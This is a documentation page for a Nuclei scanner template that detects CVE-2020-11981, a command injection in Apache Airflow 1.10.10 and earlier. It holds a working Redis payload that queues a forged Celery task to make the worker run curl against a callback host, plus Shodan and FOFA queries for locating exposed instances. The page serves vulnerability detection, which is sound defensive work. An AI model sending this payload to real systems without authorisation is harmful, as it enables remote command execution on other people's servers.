Apache Airflow <=1.10.10 - Command Injection
ID: CVE-2020-11981
Severity: critical
Author: pussycat0x
Tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
Description
Section titled “Description”An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
YAML Source
Section titled “YAML Source”id: CVE-2020-11981
info: name: Apache Airflow <=1.10.10 - Command Injection author: pussycat0x severity: critical description: | An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: Upgrade apache-airflow to version 1.10.11 or higher. reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - https://github.com/t0m4too/t0m4to - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 epss-score: 0.93315 epss-percentile: 0.99068 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: apache product: airflow shodan-query: - product:"redis" - http.title:"airflow - dags" || http.html:"apache airflow" - http.title:"sign in - airflow" fofa-query: - apache airflow - title="airflow - dags" || http.html:"apache airflow" - title="sign in - airflow" google-query: - intitle:"airflow - dags" || http.html:"apache airflow" - intitle:"sign in - airflow" tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcpvariables: data: "*3\r
$5\r
LPUSH\r
$7\r
default\r
$936\r
{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" encode1: '[[["curl", "http://' encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]' end: '"}'tcp: - inputs: - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
')}}" read: 1024 host: - "{{Hostname}}" - "{{Host}}:6379"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "User-Agent: curl"# digest: 4b0a00483046022100965cc533781bbbac803402b9af68a4187904ca937f56cb7898542e60943b76c90221009f5562beaa71f2b36bba2cd6311f5d73be8af8b45659aead791529031db485e2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "network/cves/2020/CVE-2020-11981.yaml"